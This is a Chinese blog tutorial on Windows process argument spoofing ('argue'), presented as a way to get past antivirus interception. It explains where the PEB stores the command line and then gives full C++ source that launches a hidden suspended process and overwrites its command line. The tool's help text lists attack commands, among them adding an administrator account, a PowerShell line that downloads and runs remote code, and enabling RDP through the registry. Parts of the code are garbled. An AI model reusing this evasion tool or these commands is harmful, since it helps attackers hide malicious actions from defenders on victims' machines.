【argue】进程参数欺骗

最新推荐文章于 2024-04-10 20:40:07 发布
最新推荐文章于 2024-04-10 20:40:07 发布
阅读量659 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x1183834753/article/details/124886353
版权

windows

进程参数欺骗原理

我们了解到利用argue进程参数欺骗可以在一定程度上绕过杀软拦截。它的原理是怎样的?

首先我们可以了解到,在一个进程运行后,它的运行参数是保存在进程空间的。如果我们获取到保存参数的进程内存地址,并将参数进行修改(修改并不影响原始的参数功能,因为在修改之前已经被启动了)那么就可以达到“欺骗”杀软,达到不被拦截的目的。至于参数保存在进程空间的哪里,如何去获取就是接下来要讨论的。

PEB进程环境块

PEB进程环境块中存放进程相关的一些信息,而我们需要的commandline就保存在PEB里。与PEB相对应的有TEB线程环境块。

如何获取PEB?

一般的,在NT x86系统下,利用FS:[x30]就可以指向PEB,FS寄存器指向TEB,可利用内联汇编方式获取:

__asm
{
mov eax,fs:[0x30]
mov PEB,eax
}

这种方法适用于在当前进程获取,如果要读取其他进程相关信息,就不是特别方便了。

可以利用NtQueryInformationProcess函数来获取。该函数是windows NTDLL.DLL中的未公开的API函数。 用它可以将指定类型的进程信息拷贝至某个缓冲区。

函数原型:

NTSYSAPI NTSTATUS NTAPI NtQueryInformationProcess (
      IN HANDLE ProcessHandle, // 进程句柄
      IN PROCESSINFOCLASS InformationClass, // 信息类型
      OUT PVOID ProcessInformation, // 缓冲指针
      IN ULONG ProcessInformationLength, // 以字节为单位的缓冲大小
      OUT PULONG ReturnLength OPTIONAL     // 写入缓冲的字节数
);

一般情况下,path,commandline 等信息存在PEB+0x20h的位置的_RTL_USER_PROCESS_PARAMETERS结构体内。(盗wbglil师傅的图) 其中ESI指向PEB

在这里插入图片描述

在_RTL_USER_PROCESS_PARAMETERS结构体中又指向_UNICODE_STRING结构体,这个结构体保存有commandline字符串信息。

在这里插入图片描述

0:001> dt _UNICODE_STRING 0x00000240`e4b220e0+0x60
ntdll!_UNICODE_STRING
 "C:\Windows\system32\cmd.exe"
   +0x000 Length           : 0x36
   +0x002 MaximumLength    : 0x38
   +0x008 Buffer           : 0x00000240`e4b22728  "C:\Windows\system32\cmd.exe"
0:001> dt _UNICODE_STRING 0x00000240`e4b220e0+0x70
ntdll!_UNICODE_STRING
 ""C:\Windows\system32\cmd.exe" "
   +0x000 Length           : 0x3c
   +0x002 MaximumLength    : 0x3e
   +0x008 Buffer           : 0x00000240`e4b22760  ""C:\Windows\system32\cmd.exe" "

了解到commandline保存的位置之后,就可以利用NtQueryInformationProcess来一步步获取对应进程的commandline信息。

获取流程

  1. 创建一个挂起的进程

  2. 读取PEB内的_RTL_USER_PROCESS_PARAMETERS结构体

  3. 定位到commandline的buffer指针

  4. 修改buffer的存放的commandline

附上wbglil大佬的代码,比较全面了,这里做一下详细的注释:

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include<string>

using namespace std;


//声明,以便后续获取NtQueryInformationProcess函数地址时进行类型转换
typedef NTSTATUS(NTAPI *_NtQueryInformationProcess)(
	IN HANDLE ProcessHandle,  //进程句柄
	ULONG ProcessInformationClass, //信息类型
	OUT PVOID ProcessInformation, //缓冲指针
	IN ULONG ProcessInformationLength, //以字节为单位的缓冲大小
	OUT PULONG ReturnLength OPTIONAL //写入缓冲的字节数
	);

//读取目标进程空间,返回一个指针(地址)
void* readProcessMemory(HANDLE process, void address, DWORD bytes) {
	//SIZE_T bytesRead;
	char* alloc;
	alloc = (char*)malloc(bytes);
	if (alloc == NULL) {
		return NULL;
	}

	if (ReadProcessMemory(process, address, alloc, bytes, NULL) == 0) {
		free(alloc);
		return NULL;
	}
	return alloc;
}


//想目标进程空间写入数据
BOOL writeProcessMemory(HANDLE process, void address, void data, DWORD bytes) {
	//SIZE_T bytesWritten;
	if (WriteProcessMemory(process, address, data, bytes, NULL) == 0) {
		return false;
	}
	return true;
}

//字符串转宽字符
wstring charToWstring(const char* szIn)
{
	int length = MultiByteToWideChar(CP_ACP, 0, szIn, -1, NULL, 0);
	WCHAR* buf = new WCHAR[length + 1];
	ZeroMemory(buf, (length + 1) * sizeof(WCHAR));
	MultiByteToWideChar(CP_ACP, 0, szIn, -1, buf, length);
	std::wstring strRet(buf);
	delete[] buf;
	return strRet;
}

int main(int argc, char** argv)
{
	if (argc < 2) {
		printf("Usage:argue.exe \"net1.exe xx\" \"net1.exe user admin /add\" \n");
		printf("-h help");
		return 1;
	}

if (strcmp(argv[1], "-h") == 0)
{
		printf("[+] \" Escape \\\" \n");
		printf("[+] The length of parameter 1 must be greater than parameter 2.\n");
		printf("[+] Common command: \n");
		printf("argue.exe \"net1.exe xxxx\" \"net1.exe user admin pass /add\" \n");
		printf("argue.exe \"net localgroup\" \"Administrators admin /add\" \n");
		printf("argue.exe \"powershell.exe xx\" \"powershell.exe -nop -c \\\"iex(New - Object Net.WebClient).DownloadString('http://xxx/')\\\" \" \n");
		printf("argue.exe \"powershell.exe xx\" \"powershell.exe -ExecutionPolicy bypass -windowstyle hidden -EncodedCommand Base64\" \n");
		printf("argue.exe \"regedit.exe xx\" \"regedit.exe /s file.reg\" \n");
		printf("argue.exe \"reg.exe xxx\" \"reg.exe add \\\"HKEYLOCALMACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f\" \n ");
		return 1;
	}
	if (strlen(argv[1]) < strlen(argv[2]))
	{
		printf("[!] Error: Parameter 1 is less than parameter 2 \n");
		return 1;
	}

//声明一些需要的变量
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	BOOL success;
	PROCESSBASICINFORMATION pbi;
	PEB pebLocal;
	RTLUSERPROCESSPARAMETERS parameters;
	memset(&si, 0, sizeof(si));
	si.wShowWindow = SW_HIDE;
	memset(&pi, 0, sizeof(pi));

	// 创建进程
	success = CreateProcessA(
		NULL,
		argv[1],
		NULL,
		NULL,
		FALSE,
		CREATESUSPENDED | CREATENO_WINDOW,//以挂起状态启动进程
		NULL,
		//"C:\\Windows\\System32\\",
		NULL,
		&si,
		&pi);



	if (success == FALSE) {
		printf("[!] Error: Unable to call CreateProcess to create process\n");
		return 1;
	}



	//获取NtQueryInformationProcess函数地址
	NtQueryInformationProcess ntpi = (NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
	//利用获取到的NtQueryInformationProcess函数拷贝进程信息到pbi
	ntpi(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);

	//利用获取到的进程信息读取进程空间,获取peb数据到pebLocal
	success = ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &pebLocal, sizeof(PEB), NULL);

	if (success == FALSE)
	{
		TerminateProcess(pi.hProcess, 0);
		CloseHandle(pi.hProcess);
		printf("[!] Error: Could not call ReadProcessMemory to grab PEB\n");
		return -1;
	}



	//从PEB获取ProcessParameters
	parameters = (RTLUSERPROCESSPARAMETERS)readProcessMemory(
		pi.hProcess,
		pebLocal.ProcessParameters,
		sizeof(RTLUSERPROCESS_PARAMETERS) + 300
	);



	//设置我们要使用的实际参数
	wstring wspoofed = charToWstring(argv[2]);
	WCHAR wcharwspoofed = (WCHAR)wspoofed.cstr();
	//向进程PEB空间写入自己伪造的进程参数
	success = writeProcessMemory(pi.hProcess, parameters->CommandLine.Buffer, (void)wcharwspoofed, wcslen(wcharwspoofed)  2 + 1);

	if (success == FALSE) {
		TerminateProcess(pi.hProcess, 0);
		CloseHandle(pi.hProcess);
		printf("[!] Error: Could not call WriteProcessMemory to update commandline args\n");
		return 1;
	}

	//更新命令行长度欺骗进程浏览器
	DWORD newUnicodeLen = 5;
	success = WriteProcessMemory(
		pi.hProcess,
		(char)pebLocal.ProcessParameters + offsetof(RTLUSERPROCESSPARAMETERS, CommandLine.Length),
		(void*)&newUnicodeLen, 4, NULL);

	if (success == FALSE) {
		TerminateProcess(pi.hProcess, 0);
		CloseHandle(pi.hProcess);
		printf("[!] Error: Could not call WriteProcessMemory to update commandline arg length\n");
		return 1;
	}



	//恢复挂起的进程,进程参数欺骗完成
	ResumeThread(pi.hThread);
}
dr0op
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CobaltStrike的argue参数污染绕AV
谢公子的博客
06-20 3614
在获取了对方主机CobaltStrike Beacon后,需要执行一些敏感的操作(如创建用户等)。但是目标主机有AV,会直接报毒等。 使用前提:administrator 或 system权限。
APT组织最喜欢的工具 Cobalt Strike (CS) 实战
悦分享
08-03 2156
Cobalt Strike是一款以Metasploit为基础的GUI框架式渗透测试工具,自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,常被业界人称为CS神器。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。...
《操作系统真象还原》第十一章 ---- 实现用户进程 欺骗CPU通彻进程原理 眺望终点到达还需砥砺前行
Love 6's Private Blog
08-01 1978
文章目录相关查阅博客链接本书中错误勘误定义并初始化TSS修改global.h编写tss.c编写tss.h修改init.c修改后的MakeFilemake all 验证成果实现用户进程 相关查阅博客链接 本书中错误勘误 定义并初始化TSS 本书中 和 现代的操作系统Linux都没有采用硬件厂商提供的那种切换进程直接换TSS的操作 因为那样的话代价太大了 这里的话我们先把TSS基本的数据结构 和 用户进程DPL3的GDT符给弄好 因为在之前我记得是弄过了GDT了 只不过那个时候只弄了内核的描述符 而
利用进程欺骗杀受保护进程
修养生息,以得佳境
03-13 2264
欺骗原理:首先编一个我们将要伪造的程序,使他的名字和我们要杀的进程的名字相同。当我们第一次杀掉那个受保护的进程后马上对它进行改名,然后将伪造的程序复制到要杀的程序所在的目录,这样就达到了欺骗的目的。我猜想,进程保护的原理就是检测系统中是否启动了期望运行的进程,如果没有发现则启动它。如果它被改动或删除,保护进程就象病毒那样自动生成一个它期望运行的进程。因为它是按进程名检测的,那么我们把同样名字的
进程欺骗
qq_41252520的博客
04-25 2918
3.1.简介 父进程欺骗技术是说,把一个恶意进程的 PID指定为一个合法的进程(lsass.exe)的 PID。 安全软件会通过对父子进程间关系的检测来判断该进程是否异常,攻击者以此技术规避启发式检测等防御手段。 3.2.原理进程欺骗用的最多的方法就是通过CreateProcess\textcolor{cornflowerblue}{CreateProcess}CreateProcess函数实现,其原型如下: BOOL WINAPI CreateProcessA( _In_opt_ LPCS
windows进程欺骗
Timmbe的博客
12-06 442
windows进程欺骗 测试代码
Windows 得到一个进程的完整路径
FURY_QQ的博客
03-31 1508
头文件中:    #pragma once#include &lt;windows.h&gt;#include &lt;iostream&gt;using namespace std;#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) &gt;= 0)typedef struct _UNICODE_STRING{ UINT16 Length; UINT...
CobalStrike 4.0 生成后门几种方式 及 主机上线后基础操作
Ms08067安全实验室
01-22 2002
出品|MS08067实验室(www.ms08067.com)本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):步骤:Attacks—〉Pa...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
最新发布
HACKONE的博客
04-10 208
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
148.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon基础使用/脚本web传递/屏幕截图/端口扫描]
qwsn
03-19 3283
一、Cobalt Strike基本使用 1、Cobalt Strike简介 2、Cobalt Strike(CS)整体框架图 二、Cobalt Strike简单使用 1、实验坏境 2、实验过程
Cobalt Strike 简单使用
SoulCat
08-29 4338
Cobalt Strike 简单使用 我在最没有能力的年纪,碰见了最想照顾一生的人。 概述: Cobalt Strike是一款内网渗透测试神器,一个服务端,多个客户端,这样最大好处就是可以团队合作。Cobalt Strike集成了很多工具,如多模式监听(dns.smb等)、多种代理转发,自定义脚本以及生成各种版本木马,各种病毒,各种payload,进行网站克隆,钓鱼攻击等等,更方便快速的获取...
NtCreateUserProcess 初探与玩法
stopys6的博客
09-13 284
/要注意的是我们每添加一个新属性,都需要将PS_ATTRIBUTE增大,因为调用RtlAllocateHeap要为PS_ATTRIBUTE分配足够的内存空间最后NtCreateUserProcess其实很多CreateProcess的项目,就比如ppid也有用CreateProcess写的,都可以加以改变改成用NtCreateUserProcess操作的,就可以把一个很简单的被查杀CreateProcess进行一个免杀保护了。(当然也不是都能改的具体情况具体分析)
Windows编程之双进程守护
Birldlee的博客
12-26 5430
Windows编程之双进程守护Windows编程之双进程守护 需求分析 设计原理 相关函数 设计详细 方法1 方法2 项目测试情况 方法1 方法2 总结 需求分析设计实现双进程守护程序,当两个进程同时运行时,关闭其中任意一个,另一个进程会识别出来并马上打开被关闭的进程。设计原理相关函数CreateEvent( ) CreateEvent是一个Windows API函数。它用来创建或打开一个命名的或
【旧文章搬运】获取并修改PEB中的映像路径,命令行和当前目录
weixin_30709929的博客
12-26 298
原文发表于百度空间,2008-7-24 当时对UNICODE_STRING的使用还有点问题,导致最终效果图中字符串被截断了========================================================================== 先从分析PEB开始吧.感觉分析这个东西,首先要把类型定义搞清楚,这个在Windbg里dt _PEB就可以了搞清楚定义主要是为...
[笔记]Windows核心编程《番外篇》常用的NT API及使用示例
二次元怪兽的博客
05-19 1424
文章目录前言NtQueryInformationProcess函数原型附录用例总结 前言 NTAPI:泛指ntdll.dll模块不对外提供的API接口 一般通过动态载入库的方式(LoadLibrary + GetProcAddress)调用 NtQueryInformationProcess NtQueryInformationProcess NtQueryInformationProcess用法 函数原型 NTSYSCALLAPI NTSTATUS NTAPI NtQueryInformationPro
获取进程命令行参数
donglinshengan的专栏
04-14 4415
#include &lt;Winternl.h&gt;void GetProcessCommandLine(DWORD pid){ pid = 1688; HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (INVALID_HANDLE_VALUE != hProc) { HANDLE hNewProcess = NUL...
利用32位PEB结构实现从进程ID中得到进程完整路径
nyzdmc的博客
11-20 1285
本程序只使用于32位! 即只能寻找32位进程的完整路径! 使用PEB结构以得到进程的完整路径(包括从进程ID得到进程PEB地址和从PEB结构得到进程完整路径) GetProcessFullPathByProcessID相当于两个函数GetPebByProcessID,GetProcessFullPathByPeb的合并。 从PEB结构中得到进程的完整路径: 通过PEB结构中的RTL_USER_PROCESS_PARAMETERS类型的ProcessParameters成员,ProcessParamet
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值